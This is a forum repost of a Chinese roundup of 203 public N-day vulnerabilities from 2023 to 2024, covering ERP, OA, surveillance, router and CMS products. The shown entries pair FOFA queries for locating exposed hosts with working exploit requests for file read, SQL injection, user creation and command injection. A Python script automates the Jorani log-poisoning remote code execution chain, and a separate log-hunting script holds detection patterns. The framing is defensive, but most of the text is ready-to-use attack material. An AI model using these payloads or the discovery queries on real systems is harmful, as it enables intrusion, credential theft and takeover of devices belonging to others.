中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Public Internet Vulnerability Roundup, 2023-09 to 2024-06 (repost)

Author: admin    Posted: 2024-6-5 14:31

Public Internet Vulnerability Roundup, 2023-09 to 2024-06
道一安全 (Daoyi Security), 2024-06-05 07:41, Beijing
The following article is reposted from the public account 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities makes up a large share of real attacks and of offensive/defensive exercises, and this article is meant to help the defending side. Defenders can use the material below to check their own exposure.

Sources: the article covers 203 public, high-impact vulnerability POCs disclosed inside and outside China between September 2023 and May 2024. All of them were taken from other public accounts or websites and were compiled and published by the 网络安全新视界 team.

Patches: every vulnerability listed here is already public. For patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few over-long POCs are shown with the word PAYLOAD in place of the payload; search for the full POC yourself if you need it.

Rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend and the material will be removed.


Statement

To keep things simple and easy to browse, there is no "reply to see the full list". This article is the complete version; use your browser's page search (the original says F12) to look for keywords.

Bookmark this article if you need it. You can also follow the public account (网络安全新视界).
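Defenders who want to turn this list into a check of their own access logs can start from the payload shapes that recur across the entries below: ../ traversal to /etc/passwd or win.ini, the Spring ;.ico suffix trick, ${jndi: lookups, extractvalue()/updatexml() and waitfor delay injections, and fastjson @type markers. The script below is an added example (not part of the original article or the 网络安全新视界 compilation): the rule set and the Apache combined-format log lines in SAMPLE_LOG are constructed for illustration, it URL-decodes the request target repeatedly so double-encoded payloads such as the DocCMS one are still caught, and the regexes are deliberately broad, so tune them before treating a hit as an incident.

```python
"""Hunt web access logs for the payload shapes catalogued on this page.

Added example, not part of the original article. SAMPLE_LOG is constructed
for illustration; RULES are derived from the POCs listed below (traversal,
Spring ';.ico' suffix bypass, log4j JNDI lookups, MySQL/MSSQL error- and
time-based SQL injection, fastjson @type).
"""
import re
import urllib.parse

# Each rule is matched against the URL-decoded request target, so encoded
# and double-encoded variants (e.g. the DocCMS keyword payload) still hit.
RULES = [
    ("path_traversal", re.compile(r"(?:^|[/\\])\.\.(?:[/\\]|$)")),
    ("sensitive_file", re.compile(r"/etc/passwd|win\.ini|jdbc\.properties", re.I)),
    ("spring_suffix_bypass", re.compile(r";\.(?:ico|css|js|png|jpg|gif)\b", re.I)),
    ("log4j_jndi", re.compile(r"\$\{jndi:", re.I)),
    ("mysql_error_sqli", re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I)),
    ("mssql_sqli", re.compile(r"waitfor\s+delay|@@version|hashbytes\s*\(", re.I)),
    ("fastjson_type", re.compile(r"@type", re.I)),
]

# Apache/nginx "combined" access-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: lines 1-4 and 6 replay payloads from this page, line 5 is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jun/2024:07:41:00 +0800] "GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1" 200 1421
203.0.113.7 - - [05/Jun/2024:07:41:01 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 8802
203.0.113.8 - - [05/Jun/2024:07:41:02 +0800] "GET /search/index.php?keyword=%2527%2520and%2520(extractvalue(1%252Cconcat(0x7e%252C(select%2520user())%252C0x7e)))%2523 HTTP/1.1" 500 612
203.0.113.9 - - [05/Jun/2024:07:41:03 +0800] "GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1" 200 77
198.51.100.2 - - [05/Jun/2024:07:41:04 +0800] "GET /index.html HTTP/1.1" 200 5120
198.51.100.2 - - [05/Jun/2024:07:41:05 +0800] "GET /docs/v2/..%2F..%2Fwin.ini HTTP/1.1" 404 0
"""


def fully_decode(s: str, rounds: int = 3) -> str:
    """URL-decode until the string stops changing (bounded), so %2527 -> %27 -> ' is caught."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(target: str) -> list[str]:
    """Names of every rule the decoded request target trips, in RULES order."""
    decoded = fully_decode(target)
    return [name for name, rx in RULES if rx.search(decoded)]


def hunt(log_text: str) -> list[tuple[int, str, list[str]]]:
    """(line number, client ip, rules hit) for every suspicious line; unparsable lines are skipped."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = classify(m["target"])
        if rules:
            hits.append((n, m["ip"], rules))
    return hits


if __name__ == "__main__":
    for n, ip, rules in hunt(SAMPLE_LOG):
        print(f"line {n} from {ip}: {', '.join(rules)}")
```

Feed it a real log with hunt(open(path).read()); only the request line is inspected, so POST bodies (the SOAP, JSON and multipart payloads later on this page) need a WAF or application log rather than the access log.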
Contents

1. StarRocks MPP database unauthenticated access
2. Casdoor /static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. Hongyun (鸿运) Active Safety Monitoring Cloud Platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS Smart Collaboration Platform api.aspx arbitrary file upload
11. Landray EIS Smart Collaboration Platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP getAllList information disclosure
16. Hongfan HFOffice (医微云) SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo API SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. Yunshikong (云时空) Social Commerce ERP validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPtech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Baizhuo (百卓) Smart management platform importexport.php SQL injection
61. Zhejiang University Enter (浙大恩特) CRM fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
65. Youkate (优卡特) 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu (万户) ezOFFICE SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) traffic-control router remote command execution
80. Suda Tianyao (速达天耀) software DesignReportSave.jsp arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. Sifudi (思福迪) LOGBASE ops security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity (安恒) MingYu security gateway aaa_local_web_preview file upload
88. DBAppSecurity MingYu security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin (奇安信) Wangshen SecGate3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. Hunan Jianyan (湖南建研) engineering quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall (H5云商城) file.php file upload
134. NetentSec (网康) NS-ASG application security gateway index.php SQL injection
135. NetentSec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Kirisun (福建科立讯) communication command-and-dispatch platform down_file.php SQL injection
138. Kirisun communication command-and-dispatch platform pwd_update.php SQL injection
139. Kirisun communication command-and-dispatch platform editemedia.php SQL injection
140. Kirisun communication command-and-dispatch platform get_extension_yl.php SQL injection
141. Kirisun communication command-and-dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass / template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. Tianweier (天维尔) fire and rescue dispatch platform SQL injection
155. 六零导航页 (navigation page) file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. Meite (美特) CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. Infinitt (英飞达) medical imaging PACS WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. Keytop (科拓) smart parking fee system Webservice.asmx arbitrary file upload
162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) smart campus management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
167. Lean value management system (精益价值管理系统) DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. Tongtianxing (通天星) CMSV6 vehicle GPS monitoring platform SQL injection
172. DT HD licence-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinhe (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinhe OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. Jianwen (建文) engineering management system arbitrary file read
180. Bangguanke (帮管客) CRM jiliyu SQL injection
181. Runshen (润申) enterprise standardisation management system UpdataLogHandler.ashx SQL injection
182. Runshen enterprise standardisation management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou Tuchuang (图创) library cluster management system updOpuserPw SQL injection
184. Xunrao (迅饶) X2Modbus gateway AddUser arbitrary user creation
185. Realor (瑞友) Tianyi application virtualisation system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. Santi (叁体) Jiahui video conferencing attachment arbitrary file read
189. Lanwang (蓝网科技) clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. Esafenet (亿赛通) electronic document security management system NavigationAjax SQL injection
192. Futong Tianxia (富通天下) foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) Yunjian security management system setsystemtimeaction command execution
194. FE (飞企互联) enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. Feiyuxing (飞鱼星) internet behaviour management system send_order.cgi command execution
196. Henan Fengsu (风速科技) unified authentication platform password reset
197. Zhejiang University Enter CRM Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. Cockpit assetsmanager_upload file upload
200. SeaCMS dmku SQL injection
201. Founder (方正) all-media news editing system binary SQL injection
202. We7 (微擎) AccountEdit arbitrary file upload
203. Hongaiyun (红海云) EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: x.x.x.x

The memory-tracker page belongs to the BE HTTP service (port 8040 by default); an unauthenticated 200 carrying the tracker table means that port is reachable without access control.

2. Casdoor /static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Send the path exactly as written (for curl that means --path-as-is, otherwise the client collapses the ../ segments before the request leaves); a root:x:0:0 line in the body confirms the read.

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of the password you intend to log in with; roleid=1 is the value used in the POC.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

The log parameter is concatenated into a shell command; the output of whoami comes back in the response body.

6. Sangfor (深信服) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host: x.x.x.x

The /./ in the path side-steps a literal blacklist of /etc/passwd while still resolving to the same file.

7. Hongyun (鸿运) Active Safety Monitoring Cloud Platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host: x.x.x.x

jdbc.properties holds the database connection string and credentials, which is why it is the file the POC reads.

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin interface with the default account admin first; the stok token in the URL and the sysauth cookie both come from that login session. The injection point is the wifiRebootrange field (a time value followed by a shell command). The %s placeholders are left as they appear in the source.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<sysauth cookie obtained at login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL-encoding of the statement below (MySQL error-based; the current database user is returned inside the XPath error message):

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray (蓝凌) EIS Smart Collaboration Platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

The upload response contains the path of the stored file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS Smart Collaboration Platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

SQL Server error-based: comparing the integer 1 with @@version forces a conversion error whose message echoes the version string.

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: fetch the login page to obtain the session and CSRF cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in this response is reused in the following requests:
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST the login form. The language field traverses to the application log directory, and the login field is written into that day's log file as PHP that runs system() on the base64-decoded value of the K1SYJPMHLU4Z request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Step 3: request the poisoned log file as a view so it is included and executed. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 of "echo ---------;id 2>&1;echo ---------;", so the output of id is delimited in the response. The file name is the server's local date of the Step 2 request.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

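The three requests above form one chain: cookies from the login page, a login attempt whose fields poison that day's application log while the language value points the include at the logs directory, then a view request that includes the log with the command carried in a header. Below is that chain as a script, added here as an example (not the original author's tooling or the Jorani project's code). It builds and parses the messages but does not send them, so wire in a socket or HTTP client for a lab target. The header name K1SYJPMHLU4Z, the DummyPassword value and the cookie values in SAMPLE_RESPONSE are taken from the POC; the echo markers are there so the command output can be cut out of the surrounding HTML.

```python
"""Jorani log-poisoning chain from the three requests above, as one script.

Added example, not the original author's tooling. It only builds and parses
the messages; sending them is left to the reader's lab setup. Cookie values
and the shell header name K1SYJPMHLU4Z are the ones in the POC;
SAMPLE_RESPONSE is the Step 1 response pasted above (headers trimmed).
"""
import base64
from urllib.parse import quote

SHELL_HEADER = "K1SYJPMHLU4Z"   # header whose base64 value the stager executes
MARK = "---------"              # echoed before and after the command output

SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; "
    "expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/\r\n"
    "Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; "
    "expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly\r\n"
    "\r\n"
)


def parse_cookies(raw_response: str) -> dict:
    """Step 1: collect name=value from every Set-Cookie header (attributes dropped)."""
    jar = {}
    head = raw_response.split("\r\n\r\n", 1)[0]
    for line in head.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "set-cookie":
            k, _, v = value.strip().split(";", 1)[0].partition("=")
            jar[k.strip()] = v.strip()
    return jar


def cookie_header(jar: dict) -> str:
    return "; ".join(f"{k}={v}" for k, v in jar.items())


def poison_request(host: str, jar: dict) -> str:
    """Step 2: the login POST. 'language' traverses to application/logs so the
    daily log is later included as a view; 'login' is logged verbatim and is
    the PHP stager. The CSRF form field must equal the csrf_cookie_jorani cookie."""
    stager = ("<?php if(isset($_SERVER['HTTP_%s']))"
              "{system(base64_decode($_SERVER['HTTP_%s']));} ?>" % (SHELL_HEADER, SHELL_HEADER))
    fields = [
        ("csrf_test_jorani", jar["csrf_cookie_jorani"]),
        ("last_page", "session/login"),
        ("language", "../../application/logs"),
        ("login", stager),
        ("CipheredValue", "DummyPassword"),
    ]
    body = "&".join(f"{k}={quote(v, safe='')}" for k, v in fields)
    return (f"POST /session/login HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_header(jar)}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\nConnection: close\r\n\r\n{body}")


def encode_command(command: str) -> str:
    """Wrap the command in MARK echoes and base64 it for the shell header."""
    wrapped = f"echo {MARK};{command} 2>&1;echo {MARK};"
    return base64.b64encode(wrapped.encode()).decode()


def trigger_request(host: str, jar: dict, command: str, log_date: str) -> str:
    """Step 3: include the poisoned log (log-YYYY-MM-DD, server-local date of Step 2)."""
    return (f"GET /pages/view/log-{log_date} HTTP/1.1\r\nHost: {host}\r\n"
            f"Cookie: {cookie_header(jar)}\r\n"
            f"{SHELL_HEADER}: {encode_command(command)}\r\n"
            "X-Requested-With: XMLHttpRequest\r\nConnection: close\r\n\r\n")


def extract_output(response_body: str) -> str:
    """Return the command output between the two MARK lines, or '' if absent."""
    parts = response_body.split(MARK)
    return parts[1].strip() if len(parts) >= 3 else ""


if __name__ == "__main__":
    jar = parse_cookies(SAMPLE_RESPONSE)
    print(poison_request("192.168.190.30", jar))
    print(trigger_request("192.168.190.30", jar, "id", "2023-10-24"))
```

encode_command("id") reproduces the exact header value in the POC above, which is a quick way to confirm what a captured K1SYJPMHLU4Z header was asking the host to run.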
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. Huaxia ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The ;.ico suffix is matrix-parameter syntax: Spring strips it before routing to /user/getAllList, but the login interceptor sees what looks like a static resource and skips the check.

15. Huaxia ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

The same interceptor bypass with a dot-segment instead of a matrix parameter: the raw URI looks like a request under a.ico, but the path resolves to /user/getAllList. Send it with client-side path normalisation disabled.

